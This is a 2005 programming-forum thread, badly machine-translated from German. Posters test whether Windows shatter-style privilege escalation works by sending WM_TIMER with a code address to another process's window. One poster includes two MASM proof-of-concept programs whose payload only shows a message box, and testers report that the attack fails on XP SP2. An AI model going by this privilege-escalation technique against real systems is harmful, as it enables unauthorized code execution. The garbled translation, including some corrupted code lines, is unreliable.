English
Forum

Help! WM_TIMER is one barn door!!!

 
Hello Profaner..

has time someone pleasure To testing, whether [...]  XP generally gefixt is?

- a service To programieren is for not absolutely necessary, normales Program with RUN AS (too with PrivAktivate possible) as Admin Starting and the Angreiferprogramm in a Account with eingeschränkten Rechten perform.
- into Hauptprogramm a Timer insert (must naturally one Window having).
- in the Angreiferprogramm a procedure write, a Messagebox outputs, The Proc but not perform let.
- with ProcAddr The address the procedure detect.
- with PostMessage (or Perhaps SendMessage) WM_TIMER with the address the procedure of Angreiferprogramm on the Hauptprogramm Send.

Klapp the???

 
05/20/05  
 



Hey, no comments? no interest, the time To testing??

I übersetze time: loudly the Artikels is it possible, with the Message WM_TIMER one Program, the a Timer using and a own Window has, moreover To moving, own code to execute.
walk these programs on one others Account as on my (z.B. as interaktiver service), would these programs with the Rechten this others Accounts carryed out go.
one loggt itself quasi as Guest one, sends on the lever the Mainwindow one ongoing Virenscanners or of/ one Firewall a WM_TIMER Message and can itself then over a selbstgeschriebene PROC Administratorprivilegien verschaffen.
lead not The entire windows safety in that absurd?
 
05/20/05  
 



have whom item too only überflogen - but too so understood How You AH.

I write grade on the ACP the ODoku - I should again very reading whether hierbei too The ProcAddr external Progs mgl. is - or only The ProcAddr eigener Procs.

salvo.
 
05/20/05  
 




Frank
Abbing
Hi,

I habs tested. at least XP Home becomes not The Prozedure the Zielprogramms in the Quellprogramm carryed out! instead becomes the Quellprogramm over ands over again launched!!!

in the attachment my both Testprogramme. to that testing the Quellprogramm first Starting and run. then the Zielprogramm started. usually should itself now - so Andreas right has - in the Quellprogramm each second a Messagebox open. by me is not so. be time tensely, How itself with the others Windowsversionen behave...

3 kB
Hochgeladen:05/20/05
Downloadcounter36
Download
 
05/20/05  
 



Selbes by me: xph,xpp!

certainly ever such one kumulatives Update

Vorrausgesetzt naturally Franks demonstration corresponds to the Behaupteten.

salvo,
 
05/20/05  
 




Frank
Abbing
Have attempts The procedure-address over tmprc and over wTimerID (actually version) To transfer. Both the same Ergebniss...
here The Source code:

fountain:
CompileMarkSeparation
.386                   ; minimum processor needed for 32 bit
.model flat, stdcall   ; FLAT memory model & STDCALL calling
option casemap :none   ; set code to case sensitive
include masm32includewindows.inc
include masm32includeuser32.inc
include masm32includekernel32.inc
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
include    D:PROGRAMMEmasm32includedebug.inc
includelib D:PROGRAMMEmasm32libdebug.lib
szText MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name db Text,0
lbl:
ENDM
m2m MACRO M1, M2
push M2
pop  M1
ENDM
return MACRO arg
mov eax, arg
ret
ENDM
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
TopXY PROTO   :DWORD,:DWORD
.data
szDisplayName db "Quellfenster mit Timer",0
CommandLine   dd 0
hWnd          dd 0
hInstance     dd 0
timer         dd 0
testit        db "Test",0
.code
start:
invoke GetModuleHandle, NULL ; provides the instance handle
mov hInstance, eax
invoke GetCommandLine        ; provides the command line address
mov CommandLine, eax
invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT
invoke ExitProcess,eax       ; cleanup & return to operating system
WinMain proc hInst     :DWORD,
hPrevInst :DWORD,
CmdLine   :DWORD,
CmdShow   :DWORD
LOCAL wc   :WNDCLASSEX
LOCAL msg  :MSG
LOCAL Wwd  :DWORD
LOCAL Wht  :DWORD
LOCAL Wtx  :DWORD
LOCAL Wty  :DWORD
szText szClassName,"Generic_Class"
mov wc.cbSize,         sizeof WNDCLASSEX
mov wc.style,          CS_HREDRAW or CS_VREDRAW
or CS_BYTEALIGNWINDOW
mov wc.lpfnWndProc,    offset WndProc      ; address of WndProc
mov wc.cbClsExtra,     NULL
mov wc.cbWndExtra,     NULL
m2m wc.hInstance,      hInst               ; instance handle
mov wc.hbrBackground,  COLOR_BTNFACE+1     ; system color
mov wc.lpszMenuName,   NULL
mov wc.lpszClassName,  offset szClassName  ; window class name
invoke LoadIcon,hInst,500    ; icon ID   ; resource icon
mov wc.hIcon,          eax
invoke LoadCursor,NULL,IDC_ARROW         ; system cursor
mov wc.hCursor,        eax
mov wc.hIconSm,        0
invoke RegisterClassEx, ADDR wc     ; register the window class
mov Wwd, 500
mov Wht, 350
invoke GetSystemMetrics,SM_CXSCREEN ; get screen width in pixels
invoke TopXY,Wwd,eax
mov Wtx, eax
invoke GetSystemMetrics,SM_CYSCREEN ; get screen height in pixels
invoke TopXY,Wht,eax
mov Wty, eax
invoke CreateWindowEx,WS_EX_OVERLAPPEDWINDOW,
ADDR szClassName,
ADDR szDisplayName,
WS_OVERLAPPEDWINDOW,
Wtx,Wty,Wwd,Wht,
NULL,NULL,
hInst,NULL
mov   hWnd,eax  ; copy return value into handle DWORD
invoke LoadMenu,hInst,600                 ; load resource menu
invoke SetMenu,hWnd,eax                   ; set it to main window
invoke ShowWindow,hWnd,SW_SHOWNORMAL      ; display the window
invoke UpdateWindow,hWnd                  ; update the display
StartLoop:
invoke GetMessage,ADDR msg,NULL,0,0         ; get each message
cmp eax, 0                                  ; exit if GetMessage()
je ExitLoop                                 ; returns zero
invoke TranslateMessage, ADDR msg           ; translate it
invoke DispatchMessage,  ADDR msg           ; send it to message proc
jmp StartLoop
ExitLoop:
return msg.wParam
WinMain endp
; #########################################################################
WndProc proc hWin   :DWORD,
uMsg   :DWORD,
wParam :DWORD,
lParam :DWORD

.if uMsg == WM_COMMAND

    .if wParam == 1000

        invoke SendMessage,hWin,WM_SYSCOMMAND,SC_CLOSE,NULL

    .elseif wParam == 1900

        szText TheMsg,"Assembler, Pure & Simple"
        invoke MessageBox,hWin,ADDR TheMsg,ADDR szDisplayName,MB_OK

    .endif

.elseif uMsg == WM_TIMER

    .if wParam!=111

        invoke SetTimer,hWnd,111,1000,wParam

    .endif

.elseif uMsg == WM_DESTROY

    invoke PostQuitMessage,NULL
    return 0

.endif

invoke DefWindowProc,hWin,uMsg,wParam,lParam
ret
WndProc endp
; ########################################################################
TopXY proc wDim:DWORD, sDim:DWORD
shr sDim, 1      ; divide screen dimension by 2
shr wDim, 1      ; divide window dimension by 2
mov eax, wDim    ; copy window dimension into eax
sub sDim, eax    ; sub half win dimension from half screen dimension
return sDim
TopXY endp
; ###################################################################
end start

target:
CompileMarkSeparation
.386                   ; minimum processor needed for 32 bit
.model flat, stdcall   ; FLAT memory model & STDCALL calling
option casemap :none   ; set code to case sensitive
include masm32includewindows.inc
include masm32includeuser32.inc
include masm32includekernel32.inc
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
include    D:PROGRAMMEmasm32includedebug.inc
includelib D:PROGRAMMEmasm32libdebug.lib
szText MACRO name, Text:VARARG
LOCAL lbl
jmp lbl
name db Text,0
lbl:
ENDM
m2m MACRO M1, M2
push M2
pop  M1
ENDM
return MACRO bad
mov eax, bad
ret
ENDM
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
TopXY PROTO   :DWORD,:DWORD
.data
szDisplayName db "Zielfenster without Timer",0
CommandLine   dd 0
hWnd          dd 0
hInstance     dd 0
timer         dd 0
testit        db "Test",0
fname         db "Quellfenster with Timer",0
cname         db "Generic_Class",0
.code
start:
invoke GetModuleHandle, NULL ; provides the instance lever
mov hInstance, eax
invoke GetCommandLine        ; provides the command line address
mov CommandLine, eax
invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT
invoke ExitProcess,eax       ; cleanup & return to operating system
timerproc proc
invoke MessageBox,0,addr testit,addr testit,64
ret
timerproc endp
WinMain proc hInst     :DWORD,
hPrevInst :DWORD,
CmdLine   :DWORD,
CmdShow   :DWORD
LOCAL wc   :WNDCLASSEX
LOCAL msg  :MSG
LOCAL Wwd  :DWORD
LOCAL Wht  :DWORD
LOCAL Wtx  :DWORD
LOCAL Wty  :DWORD
szText szClassName,"Generic_Class"
mov wc.cbSize,         sizeof WNDCLASSEX
mov wc.style,          CS_HREDRAW or CS_VREDRAW
or CS_BYTEALIGNWINDOW
mov wc.lpfnWndProc,    offset WndProc      ; address of WndProc
mov wc.cbClsExtra,     NULL
mov wc.cbWndExtra,     NULL
m2m wc.hInstance,      hInst               ; instance lever
mov wc.hbrBackground,  COLOR_BTNFACE+1     ; system color
mov wc.lpszMenuName,   NULL
mov wc.lpszClassName,  offset szClassName  ; window class name
invoke LoadIcon,hInst,500    ; icon ID   ; resource icon
mov wc.hIcon,          eax
invoke LoadCursor,NULL,IDC_ARROW         ; system cursor
mov wc.hCursor,        eax
mov wc.hIconSm,        0
invoke RegisterClassEx, ADDR wc     ; tab the window class
mov Wwd, 500
mov Wht, 350
invoke GetSystemMetrics,SM_CXSCREEN ; get screen width in pixels
invoke TopXY,Wwd,eax
mov Wtx, eax
invoke GetSystemMetrics,SM_CYSCREEN ; get screen height in pixels
invoke TopXY,Wht,eax
mov Wty, eax
invoke CreateWindowEx,WS_EX_OVERLAPPEDWINDOW,
ADDR szClassName,
ADDR szDisplayName,
WS_OVERLAPPEDWINDOW,
Wtx,Wty,Wwd,Wht,
NULL,NULL,
hInst,NULL
mov   hWnd,eax  ; copy return value into lever DWORD
invoke LoadMenu,hInst,600                 ; load resource menu
invoke SetMenu,hWnd,eax                   ; set it to main window
invoke ShowWindow,hWnd,SW_SHOWNORMAL      ; display the window
invoke UpdateWindow,hWnd                  ; update the display
invoke FindWindow,addr cname,addr fname

.if eax!=0

    invoke SendMessage,eax,WM_TIMER,addr timerproc,addr timerproc

.endif

StartLoop:
invoke GetMessage,ADDR msg,NULL,0,0         ; get each message
cmp eax, 0                                  ; exit if GetMessage()
apiece ExitLoop                                 ; returns zero
invoke TranslateMessage, ADDR msg           ; translate it
invoke DispatchMessage,  ADDR msg           ; send it to message proc
jmp StartLoop
ExitLoop:
return msg.wParam
WinMain endp
WndProc proc hWin   :DWORD,
uMsg   :DWORD,
wParam :DWORD,
lParam :DWORD

.if uMsg == WM_COMMAND

    .if wParam == 1000

        invoke SendMessage,hWin,WM_SYSCOMMAND,SC_CLOSE,NULL

    .elseif wParam == 1900

        szText TheMsg,"Assembler, Pure & Simple"
        invoke MessageBox,hWin,ADDR TheMsg,ADDR szDisplayName,MB_OK

    .endif

.elseif uMsg == WM_DESTROY

    invoke PostQuitMessage,NULL
    return 0

.endif

invoke DefWindowProc,hWin,uMsg,wParam,lParam
ret
WndProc endp
; ########################################################################
TopXY proc wDim:DWORD, sDim:DWORD
shr sDim, 1      ; divide screen size by 2
shr wDim, 1      ; divide window size by 2
mov eax, wDim    ; copy window size into eax
sub sDim, eax    ; sub helped win size from helped screen size
return sDim
TopXY endp
; ########################################################################
end start
 
05/20/05  
 




CB
XP per SP2: selbes result How with Frank.
 
XProfan 8/9.1, Win XP, AMD 64/3200
05/21/05  
 



I have The thing time with of/ one others Message and within one local Prozesses tested. thereby becomes really The angegebene address angesprungen.

to that Happiness does it means still not so simply:
eachone Process has Yes (if I it correctly. understood have) its private Adressbereich. an ermittelte address relating itself means Yes always only on the actually Process. so the Process, whom I attackieren wants, white which address it start should, becomes one well something investigating, mappen and calculate must. in the item is indeed of a Debugger The speech...
 
05/21/05  
 




Jörg
Sellmeyer
by me happens quite nothing.
Win98SE / XProfan9
 
Windows XP SP2 XProfan X4
... und hier mal was ganz anderes als Profan ...
05/21/05  
 



Hello Jörg...

can also not, address fits not.
 
05/21/05  
 




Frank
Abbing
Hi,

> can also not, address fits not.

The address fit already. have the screen. the Sourceprogramm sustain objectively very The address. only bend windows at install the Timers XP The address circa on the Startpunkt of their own Program. under 98 becomes the Timer against it apparently none launched.
 
05/21/05  
 



Hello Frank...

I suspect time, the The address , everybody can there get, one virtual address is, the ever on the actually Process related is. (see I the right? with your MASM Kenntnissen become You the on jedenfall rather know as i.) I suspect, the one first once The reale Adrese the Prtozedur in memory having must. thereafter could one evtl. The sustained address on the To attackierenden process converting, which reale Speicheradresse one moreover but too first once kennen should. How you see the?

alas Yes..., The Message EM_SETWORDBREAKPROC should ditto moreover used go can, strangers code anzuspringen - with the can itself the evtl. rather testing.
 
05/21/05  
 




Answer


Topictitle, max. 100 characters.
 

Systemprofile:

no Systemprofil laid out. [anlegen]

XProfan:

 Posting  Font  Smilies  ▼ 

Please register circa a Posting To verfassen.
 

Topic-Options

8.467 Views

Themeninformationen



Admins  |  AGB  |  Applications  |  Authors  |  Chat  |  Privacy Policy  |  Download  |  Entrance  |  Help  |  Merchantportal  |  Imprint  |  Mart  |  Interfaces  |  SDK  |  Services  |  Games  |  Search  |  Support

One proposition all XProfan, The there's!


My XProfan
Private Messages
Own Storage Forum
Topics-Remember-List
Own Posts
Own Topics
Clipboard
Log off
 Deutsch English Français Español Italia
Translations

Privacy Policy


we use Cookies only as Session-Cookies because of the technical necessity and with us there no Cookies of Drittanbietern.

If you here on our Website click or navigate, stimmst You ours registration of Information in our Cookies on XProfan.Net To.

further Information To our Cookies and moreover, How You The control above keep, find You in ours nachfolgenden Datenschutzerklärung.


all rightDatenschutzerklärung
i want none Cookie